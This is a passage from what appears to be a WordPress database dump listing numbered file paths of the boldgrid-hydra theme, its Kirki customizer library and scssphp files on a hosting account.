core/class-kirki-sanitize-values.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-sanitize-values.php'),(14664,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-section.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-section.php'),(14665,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-setting-site-option.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-setting-site-option.php'),(14666,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-setting-user-meta.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-setting-user-meta.php'),(14667,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-settings.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-settings.php'),(14668,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-toolkit.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-toolkit.php'),(14669,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-util.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-util.php'),(14670,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-values.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-values.php'),(14671,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki.php'),(14672,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/deprecated.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/deprecated.php'),(14673,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/dynamic-css.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/dynamic-css.php'),(14674,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/example.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/example.php'),(14675,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-background.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-background.php'),(14676,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-checkbox.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-checkbox.php'),(14677,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-code.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-code.php'),(14678,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color-alpha.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color-alpha.php'),(14679,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color-palette.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color-palette.php'),(14680,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color.php'),(14681,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-custom.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-custom.php'),(14682,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dashicons.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dashicons.php'),(14683,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-date.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-date.php'),(14684,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dimension.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dimension.php'),(14685,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dimensions.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dimensions.php'),(14686,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-editor.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-editor.php'),(14687,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-fontawesome.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-fontawesome.php'),(14688,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-generic.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-generic.php'),(14689,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-group-title.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-group-title.php'),(14690,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-image.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-image.php'),(14691,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-kirki-generic.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-kirki-generic.php'),(14692,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-link.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-link.php'),(14693,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-multicheck.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-multicheck.php'),(14694,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-multicolor.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-multicolor.php'),(14695,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-number.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-number.php'),(14696,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-palette.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-palette.php'),(14697,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-preset.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-preset.php'),(14698,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio-buttonset.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio-buttonset.php'),(14699,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio-image.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio-image.php'),(14700,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio.php'),(14701,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-repeater.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-repeater.php'),(14702,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select.php'),(14703,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select2-multiple.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select2-multiple.php'),(14704,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select2.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select2.php'),(14705,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-slider.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-slider.php'),(14706,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-sortable.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-sortable.php'),(14707,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-spacing.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-spacing.php'),(14708,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-switch.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-switch.php'),(14709,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-text.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-text.php'),(14710,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-textarea.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-textarea.php'),(14711,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-toggle.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-toggle.php'),(14712,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-typography.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-typography.php'),(14713,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-upload.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-upload.php'),(14714,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-url.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-url.php'),(14715,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/kirki.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/kirki.php'),(14716,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/l10n.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/l10n.php'),(14717,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/lib/class-aricolor.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/lib/class-aricolor.php'),(14718,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/lib/class-kirki-color.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/lib/class-kirki-color.php'),(14719,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/collapsible/class-kirki-modules-collapsible.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/collapsible/class-kirki-modules-collapsible.php'),(14720,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/collapsible/collapsible.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/collapsible/collapsible.js'),(14721,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/class-kirki-css-to-file.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/class-kirki-css-to-file.php'),(14722,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/class-kirki-modules-css-generator.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/class-kirki-modules-css-generator.php'),(14723,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/class-kirki-modules-css.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/class-kirki-modules-css.php'),(14724,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/class-kirki-output.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/class-kirki-output.php'),(14725,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-background.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-background.php'),(14726,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-dimensions.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-dimensions.php'),(14727,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-image.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-image.php'),(14728,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-multicolor.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-multicolor.php'),(14729,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-typography.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/field/class-kirki-output-field-typography.php'),(14730,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/property/class-kirki-output-property-background-image.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/property/class-kirki-output-property-background-image.php'),(14731,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/property/class-kirki-output-property-background-position.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/property/class-kirki-output-property-background-position.php'),(14732,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/property/class-kirki-output-property-font-family.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/property/class-kirki-output-property-font-family.php'),(14733,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/property/class-kirki-output-property.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/css/property/class-kirki-output-property.php'),(14734,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/class-kirki-modules-custom-sections.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/class-kirki-modules-custom-sections.php'),(14735,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/panels/class-kirki-panels-nested-panel.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/panels/class-kirki-panels-nested-panel.php'),(14736,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/sections/class-kirki-sections-default-section.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/sections/class-kirki-sections-default-section.php'),(14737,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/sections/class-kirki-sections-expanded-section.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/sections/class-kirki-sections-expanded-section.php'),(14738,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/sections/class-kirki-sections-nested-section.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/sections/class-kirki-sections-nested-section.php'),(14739,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/sections.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/custom-sections/sections.js'),(14740,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/customizer-branding/branding.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/customizer-branding/branding.js'),(14741,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/customizer-branding/class-kirki-modules-customizer-branding.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/customizer-branding/class-kirki-modules-customizer-branding.php'),(14742,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/customizer-styling/class-kirki-modules-customizer-styling.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/customizer-styling/class-kirki-modules-customizer-styling.php'),(14743,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/field-dependencies/class-kirki-modules-field-dependencies.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/field-dependencies/class-kirki-modules-field-dependencies.php'),(14744,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/field-dependencies/field-dependencies.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/field-dependencies/field-dependencies.js'),(14745,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/icons/class-kirki-modules-icons.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/icons/class-kirki-modules-icons.php'),(14746,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/icons/icons.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/icons/icons.js'),(14747,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/loading/class-kirki-modules-loading.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/loading/class-kirki-modules-loading.php'),(14748,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/post-meta/class-kirki-modules-post-meta.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/post-meta/class-kirki-modules-post-meta.php'),(14749,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/post-meta/customize-controls.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/post-meta/customize-controls.js'),(14750,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/post-meta/customize-preview.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/post-meta/customize-preview.js'),(14751,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/postmessage/class-kirki-modules-postmessage.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/postmessage/class-kirki-modules-postmessage.php'),(14752,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/postmessage/postmessage.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/postmessage/postmessage.js'),(14753,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/reset/class-kirki-modules-reset.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/reset/class-kirki-modules-reset.php'),(14754,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/reset/reset.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/reset/reset.js'),(14755,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/reset/set-setting-value.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/reset/set-setting-value.js'),(14756,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/selective-refresh/class-kirki-modules-selective-refresh.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/selective-refresh/class-kirki-modules-selective-refresh.php'),(14757,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/tooltips/class-kirki-modules-tooltips.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/tooltips/class-kirki-modules-tooltips.php'),(14758,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/tooltips/tooltip.js','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/tooltips/tooltip.js'),(14759,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-fonts-google.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-fonts-google.php'),(14760,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-fonts.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-fonts.php'),(14761,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-modules-webfonts-async.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-modules-webfonts-async.php'),(14762,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-modules-webfonts-embed.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-modules-webfonts-embed.php'),(14763,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-modules-webfonts-link.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-modules-webfonts-link.php'),(14764,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-modules-webfonts.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/class-kirki-modules-webfonts.php'),(14765,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/webfonts.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/modules/webfonts/webfonts.php'),(14766,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/upgrade-notifications.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/upgrade-notifications.php'),(14767,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/author-box.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/author-box.php'),(14768,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/custom-header.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/custom-header.php'),(14769,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/customizer-edit.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/customizer-edit.php'),(14770,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/extras.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/extras.php'),(14771,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/index.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/index.php'),(14772,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/template-tags.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/template-tags.php'),(14773,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/wp_bootstrap_navwalker.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/partials/wp_bootstrap_navwalker.php'),(14774,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/example/Server.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/example/Server.php'),(14775,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/scss.inc.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/scss.inc.php'),(14776,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Base/Range.php','wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Base/Range.php'),(14777,'/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/scssphp/src/Block.php','wp-content/themes/bol